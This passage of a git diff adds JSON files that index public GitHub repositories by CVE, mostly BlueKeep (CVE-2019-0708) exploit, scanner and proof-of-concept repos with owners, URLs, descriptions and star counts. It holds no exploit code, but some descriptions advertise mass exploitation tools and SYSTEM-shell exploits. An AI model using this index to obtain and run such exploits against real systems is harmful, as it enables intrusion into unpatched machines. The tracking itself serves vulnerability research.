0, + "subscribers_count": 2 + }, + { + "id": 208964787, + "name": "CVE-2019-0708", + "full_name": "1aa87148377\/CVE-2019-0708", + "owner": { + "login": "1aa87148377", + "id": 51265955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51265955?v=4", + "html_url": "https:\/\/github.com\/1aa87148377", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1aa87148377\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-09-17T05:15:28Z", + "updated_at": "2024-08-12T19:53:05Z", + "pushed_at": "2019-09-17T05:17:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 211623683, + "name": "cve-2019-0708_bluekeep_rce", + "full_name": "coolboy4me\/cve-2019-0708_bluekeep_rce", + "owner": { + "login": "coolboy4me", + "id": 10040130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10040130?v=4", + "html_url": "https:\/\/github.com\/coolboy4me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coolboy4me\/cve-2019-0708_bluekeep_rce", + "description": "it works on xp (all version sp2 sp3)", + "fork": false, + "created_at": "2019-09-29T07:38:41Z", + "updated_at": "2024-10-18T16:20:04Z", + "pushed_at": "2019-09-30T03:44:18Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 75, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 211942417, + "name": "ispy", + "full_name": "Cyb0r9\/ispy", + "owner": { + "login": "Cyb0r9", + "id": 43474676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43474676?v=4", + "html_url": "https:\/\/github.com\/Cyb0r9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb0r9\/ispy", + "description": "ispy V1.0 - Eternalblue(ms17-010)\/Bluekeep(CVE-2019-0708) Scanner and exploit ( Metasploit automation )", + "fork": false, + "created_at": "2019-09-30T19:46:21Z", + "updated_at": "2024-11-04T16:40:49Z", + "pushed_at": "2021-02-06T00:24:21Z", + "stargazers_count": 234, + "watchers_count": 234, + "has_discussions": false, + "forks_count": 74, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 74, + "watchers": 234, + "score": 0, + "subscribers_count": 22 + }, + { + "id": 223320391, + "name": "-2-CVE-2019-0708", + "full_name": "ulisesrc\/-2-CVE-2019-0708", + "owner": { + "login": "ulisesrc", + "id": 3741400, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3741400?v=4", + "html_url": "https:\/\/github.com\/ulisesrc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ulisesrc\/-2-CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-11-22T04:00:49Z", + "updated_at": "2024-08-12T19:55:05Z", + "pushed_at": "2019-11-22T04:01:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 226491441, + "name": "CVE-2019-0708", + "full_name": "worawit\/CVE-2019-0708", + "owner": { + "login": "worawit", + "id": 1352296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1352296?v=4", + "html_url": "https:\/\/github.com\/worawit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/worawit\/CVE-2019-0708", + "description": "CVE-2019-0708 (BlueKeep)", + "fork": false, + "created_at": "2019-12-07T10:13:11Z", + "updated_at": "2024-08-12T19:55:32Z", + "pushed_at": "2020-07-07T15:28:13Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 106, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 229308908, + "name": "Wincrash", + "full_name": "Ameg-yag\/Wincrash", + "owner": { + "login": "Ameg-yag", + "id": 13221081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13221081?v=4", + "html_url": "https:\/\/github.com\/Ameg-yag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ameg-yag\/Wincrash", + "description": "Mass exploit for CVE-2019-0708", + "fork": false, + "created_at": "2019-12-20T17:32:41Z", + "updated_at": "2022-07-18T20:58:02Z", + "pushed_at": "2019-10-11T20:42:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 235239045, + "name": "CVE-2019-0708-EXP-Windows", + "full_name": "cbwang505\/CVE-2019-0708-EXP-Windows", + "owner": { + "login": "cbwang505", + "id": 4487329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4487329?v=4", + "html_url": "https:\/\/github.com\/cbwang505", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbwang505\/CVE-2019-0708-EXP-Windows", + "description": "CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell", + "fork": false, + "created_at": "2020-01-21T02:22:29Z", + "updated_at": "2024-08-12T19:56:51Z", + "pushed_at": "2020-01-21T03:15:41Z", + "stargazers_count": 323, + "watchers_count": 323, + "has_discussions": false, + "forks_count": 70, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 70, + "watchers": 323, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 241542314, + "name": "CVE-2019-0708-Windows", + "full_name": "eastmountyxz\/CVE-2019-0708-Windows", + "owner": { + "login": "eastmountyxz", + "id": 53172375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53172375?v=4", + "html_url": "https:\/\/github.com\/eastmountyxz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eastmountyxz\/CVE-2019-0708-Windows", + "description": "这篇文章将分享Windows远程桌面服务漏洞(CVE-2019-0708),并详细讲解该漏洞及防御措施。作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!", + "fork": false, + "created_at": "2020-02-19T05:40:22Z", + "updated_at": "2024-08-12T19:57:53Z", + "pushed_at": "2020-03-13T12:53:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247537563, + "name": "CVE-2019-0708", + "full_name": "RICSecLab\/CVE-2019-0708", + "owner": { + "login": "RICSecLab", + "id": 55010304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55010304?v=4", + "html_url": "https:\/\/github.com\/RICSecLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RICSecLab\/CVE-2019-0708", + "description": "CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7", + "fork": false, + "created_at": "2020-03-15T19:33:53Z", + "updated_at": "2024-11-27T01:50:25Z", + "pushed_at": "2022-03-28T04:10:20Z", + "stargazers_count": 132, + "watchers_count": 132, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 132, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 247883778, + "name": "Scanner-CVE-2019-0708", + "full_name": "JSec1337\/Scanner-CVE-2019-0708", + "owner": { + "login": "JSec1337", + "id": 62246378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62246378?v=4", + "html_url": "https:\/\/github.com\/JSec1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JSec1337\/Scanner-CVE-2019-0708", + "description": "Scanner CVE-2019-0708", + "fork": false, + "created_at": "2020-03-17T05:05:14Z", + "updated_at": "2024-08-12T19:58:53Z", + "pushed_at": "2020-03-17T06:49:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 266412261, + "name": "bLuEkEeP-GUI", + "full_name": "nochemax\/bLuEkEeP-GUI", + "owner": { + "login": "nochemax", + "id": 8238744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8238744?v=4", + "html_url": "https:\/\/github.com\/nochemax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nochemax\/bLuEkEeP-GUI", + "description": "vulnerabilidad CVE-2019-0708 testing y explotacion ", + "fork": false, + "created_at": "2020-05-23T20:15:29Z", + "updated_at": "2022-03-29T23:09:05Z", + "pushed_at": "2020-05-23T20:38:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 310520152, + "name": "CVE-2019-0708-POC", + "full_name": "AaronCaiii\/CVE-2019-0708-POC", + "owner": { + "login": "AaronCaiii", + "id": 40255963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40255963?v=4", + "html_url": "https:\/\/github.com\/AaronCaiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AaronCaiii\/CVE-2019-0708-POC", + "description": null, + "fork": false, + "created_at": "2020-11-06T07:13:30Z", + "updated_at": "2020-11-06T08:07:11Z", + "pushed_at": "2020-11-06T08:07:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 318113571, + "name": "Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit", + "full_name": "DeathStroke-source\/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit", + "owner": { + "login": "DeathStroke-source", + "id": 23089257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23089257?v=4", + "html_url": "https:\/\/github.com\/DeathStroke-source", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DeathStroke-source\/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit", + "description": "Scan through given ip list", + "fork": false, + "created_at": "2020-12-03T07:40:19Z", + "updated_at": "2024-07-10T11:41:02Z", + "pushed_at": "2019-05-22T22:32:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 330872202, + "name": "CVE-2019-0708-EXP-Windows", + "full_name": "go-bi\/CVE-2019-0708-EXP-Windows", + "owner": { + "login": "go-bi", + "id": 77657159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77657159?v=4", + "html_url": "https:\/\/github.com\/go-bi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/go-bi\/CVE-2019-0708-EXP-Windows", + "description": null, + "fork": false, + "created_at": "2021-01-19T05:19:18Z", + "updated_at": "2021-01-19T05:23:44Z", + "pushed_at": "2021-01-19T05:23:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 378511068, + "name": "CVE-2019-0708", + "full_name": "CircuitSoul\/CVE-2019-0708", + "owner": { + "login": "CircuitSoul", + "id": 9803476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9803476?v=4", + "html_url": "https:\/\/github.com\/CircuitSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CircuitSoul\/CVE-2019-0708", + "description": "POC-CVE-2019-0708", + "fork": false, + "created_at": "2021-06-19T21:55:57Z", + "updated_at": "2023-08-09T17:42:04Z", + "pushed_at": "2021-06-19T21:57:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 378800668, + "name": "CVE-2019-0708", + "full_name": "pywc\/CVE-2019-0708", + "owner": { + "login": "pywc", + "id": 41107291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41107291?v=4", + "html_url": "https:\/\/github.com\/pywc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pywc\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2021-06-21T03:57:15Z", + "updated_at": "2021-08-04T18:47:21Z", + "pushed_at": "2021-08-04T18:47:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 418804153, + "name": "kali-CVE-2019-0708-lab", + "full_name": "bibo318\/kali-CVE-2019-0708-lab", + "owner": { + "login": "bibo318", + "id": 56821442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4", + "html_url": "https:\/\/github.com\/bibo318", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibo318\/kali-CVE-2019-0708-lab", + "description": null, + "fork": false, + "created_at": "2021-10-19T06:49:45Z", + "updated_at": "2021-10-19T06:52:04Z", + "pushed_at": "2021-10-19T06:49:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431718082, + "name": "CVE-2019-0708-scan", + "full_name": "lisinan988\/CVE-2019-0708-scan", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2019-0708-scan", + "description": null, + "fork": false, + "created_at": "2021-11-25T04:53:22Z", + "updated_at": "2021-11-25T05:10:42Z", + "pushed_at": "2021-11-25T04:53:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440208335, + "name": "CVE-2019-0708", + "full_name": "offensity\/CVE-2019-0708", + "owner": { + "login": "offensity", + "id": 34161284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34161284?v=4", + "html_url": "https:\/\/github.com\/offensity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/offensity\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2021-12-20T14:57:23Z", + "updated_at": "2024-04-04T09:15:50Z", + "pushed_at": "2021-12-20T15:41:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 483526584, + "name": "Haruster-CVE-2019-0708-Exploit", + "full_name": "CPT-Jack-A-Castle\/Haruster-CVE-2019-0708-Exploit", + "owner": { + "login": "CPT-Jack-A-Castle", + "id": 75252027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75252027?v=4", + "html_url": "https:\/\/github.com\/CPT-Jack-A-Castle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CPT-Jack-A-Castle\/Haruster-CVE-2019-0708-Exploit", + "description": "MS CVE 2019-0708 Python Exploit", + "fork": false, + "created_at": "2022-04-20T06:00:35Z", + "updated_at": "2022-09-24T08:16:58Z", + "pushed_at": "2022-04-20T06:00:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 537710717, + "name": "Bluekeep-Hunter", + "full_name": "Ravaan21\/Bluekeep-Hunter", + "owner": { + "login": "Ravaan21", + "id": 48627542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48627542?v=4", + "html_url": "https:\/\/github.com\/Ravaan21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ravaan21\/Bluekeep-Hunter", + "description": "CVE-2019-0708, A tool which mass hunts for bluekeep vulnerability for exploitation.", + "fork": false, + "created_at": "2022-09-17T05:41:15Z", + "updated_at": "2024-04-12T18:41:51Z", + "pushed_at": "2023-03-12T07:23:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608643543, + "name": "bluekeep", + "full_name": "davidfortytwo\/bluekeep", + "owner": { + "login": "davidfortytwo", + "id": 85337431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85337431?v=4", + "html_url": "https:\/\/github.com\/davidfortytwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidfortytwo\/bluekeep", + "description": "Checker and exploit for Bluekeep CVE-2019-0708 vulnerability", + "fork": false, + "created_at": "2023-03-02T12:55:02Z", + "updated_at": "2023-03-02T12:55:42Z", + "pushed_at": "2023-06-01T06:12:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618656315, + "name": "Detect-BlueKeep", + "full_name": "tranqtruong\/Detect-BlueKeep", + "owner": { + "login": "tranqtruong", + "id": 121711128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121711128?v=4", + "html_url": "https:\/\/github.com\/tranqtruong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tranqtruong\/Detect-BlueKeep", + "description": "a simple tool to detect the exploitation of BlueKeep vulnerability (CVE-2019-0708)", + "fork": false, + "created_at": "2023-03-25T00:55:58Z", + "updated_at": "2023-04-24T08:33:30Z", + "pushed_at": "2023-03-25T00:57:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798858095, + "name": "Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708", + "full_name": "rasan2001\/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708", + "owner": { + "login": "rasan2001", + "id": 156652838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4", + "html_url": "https:\/\/github.com\/rasan2001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rasan2001\/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2024-05-10T16:09:48Z", + "updated_at": "2024-08-01T13:54:26Z", + "pushed_at": "2024-05-10T16:10:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809335275, + "name": "Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC", + "full_name": "adyanamul\/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC", + "owner": { + "login": "adyanamul", + "id": 144979433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144979433?v=4", + "html_url": "https:\/\/github.com\/adyanamul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adyanamul\/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC", + "description": null, + "fork": false, + "created_at": "2024-06-02T12:03:12Z", + "updated_at": "2024-06-02T12:08:26Z", + "pushed_at": "2024-06-02T12:08:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855638605, + "name": "CVE-Exploitation-Reports", + "full_name": "DenuwanJayasekara\/CVE-Exploitation-Reports", + "owner": { + "login": "DenuwanJayasekara", + "id": 181200406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181200406?v=4", + "html_url": "https:\/\/github.com\/DenuwanJayasekara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DenuwanJayasekara\/CVE-Exploitation-Reports", + "description": "CVE Exploitation Reports: CVE-2007-3280, CVE-2017-0144, CVE-2019-0708", + "fork": false, + "created_at": "2024-09-11T07:56:20Z", + "updated_at": "2024-09-11T08:11:15Z", + "pushed_at": "2024-09-11T08:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881374390, + "name": "CVE-2019-0708-Check", + "full_name": "hualy13\/CVE-2019-0708-Check", + "owner": { + "login": "hualy13", + "id": 121297202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121297202?v=4", + "html_url": "https:\/\/github.com\/hualy13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hualy13\/CVE-2019-0708-Check", + "description": null, + "fork": false, + "created_at": "2024-10-31T12:57:09Z", + "updated_at": "2024-10-31T13:35:23Z", + "pushed_at": "2024-10-31T13:35:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0709.json b/2019/CVE-2019-0709.json new file mode 100644 index 0000000000..c1db5ddf1a --- /dev/null +++ b/2019/CVE-2019-0709.json @@ -0,0 +1,95 @@ +[ + { + "id": 189502228, + "name": "CVE-2019-0709", + "full_name": "YHZX2013\/CVE-2019-0709", + "owner": { + "login": "YHZX2013", + "id": 17893549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17893549?v=4", + "html_url": "https:\/\/github.com\/YHZX2013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YHZX2013\/CVE-2019-0709", + "description": "CVE-2019-0708 Exploit using Python", + "fork": false, + "created_at": "2019-05-31T00:48:49Z", + "updated_at": "2024-08-12T19:49:30Z", + "pushed_at": "2019-05-30T22:52:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 189527128, + "name": "CVE-2019-0709", + "full_name": "qq431169079\/CVE-2019-0709", + "owner": { + "login": "qq431169079", + "id": 42376039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42376039?v=4", + "html_url": "https:\/\/github.com\/qq431169079", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq431169079\/CVE-2019-0709", + "description": "Exploit In Progress", + "fork": false, + "created_at": "2019-05-31T04:23:39Z", + "updated_at": "2024-08-12T19:49:30Z", + "pushed_at": "2019-05-26T15:25:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 200350757, + "name": "CVE-2019-0709", + "full_name": "ciakim\/CVE-2019-0709", + "owner": { + "login": "ciakim", + "id": 51280572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51280572?v=4", + "html_url": "https:\/\/github.com\/ciakim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ciakim\/CVE-2019-0709", + "description": "CVE-2019-0708 Exploit", + "fork": false, + "created_at": "2019-08-03T08:19:48Z", + "updated_at": "2023-08-25T03:11:32Z", + "pushed_at": "2019-05-18T12:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0752.json b/2019/CVE-2019-0752.json new file mode 100644 index 0000000000..322400cd73 --- /dev/null +++ b/2019/CVE-2019-0752.json @@ -0,0 +1,33 @@ +[ + { + "id": 322721997, + "name": "CVE-2019-0752", + "full_name": "ZwCreatePhoton\/CVE-2019-0752", + "owner": { + "login": "ZwCreatePhoton", + "id": 73783540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73783540?v=4", + "html_url": "https:\/\/github.com\/ZwCreatePhoton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZwCreatePhoton\/CVE-2019-0752", + "description": null, + "fork": false, + "created_at": "2020-12-18T22:53:16Z", + "updated_at": "2021-08-30T01:11:16Z", + "pushed_at": "2020-12-18T23:04:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0768.json b/2019/CVE-2019-0768.json new file mode 100644 index 0000000000..cb68a7ec85 --- /dev/null +++ b/2019/CVE-2019-0768.json @@ -0,0 +1,33 @@ +[ + { + "id": 188212551, + "name": "ie11_vbscript_exploit", + "full_name": "ruthlezs\/ie11_vbscript_exploit", + "owner": { + "login": "ruthlezs", + "id": 15887791, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15887791?v=4", + "html_url": "https:\/\/github.com\/ruthlezs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruthlezs\/ie11_vbscript_exploit", + "description": "Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)", + "fork": false, + "created_at": "2019-05-23T10:28:40Z", + "updated_at": "2024-08-12T19:49:13Z", + "pushed_at": "2019-05-23T11:26:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0785.json b/2019/CVE-2019-0785.json new file mode 100644 index 0000000000..90476dcda2 --- /dev/null +++ b/2019/CVE-2019-0785.json @@ -0,0 +1,35 @@ +[ + { + "id": 196208560, + "name": "CVE-2019-0785", + "full_name": "Jaky5155\/CVE-2019-0785", + "owner": { + "login": "Jaky5155", + "id": 47801640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47801640?v=4", + "html_url": "https:\/\/github.com\/Jaky5155", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaky5155\/CVE-2019-0785", + "description": "CVE-2019-0785", + "fork": false, + "created_at": "2019-07-10T13:16:42Z", + "updated_at": "2024-08-12T19:50:55Z", + "pushed_at": "2019-07-10T13:18:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0785" + ], + "visibility": "public", + "forks": 1, + "watchers": 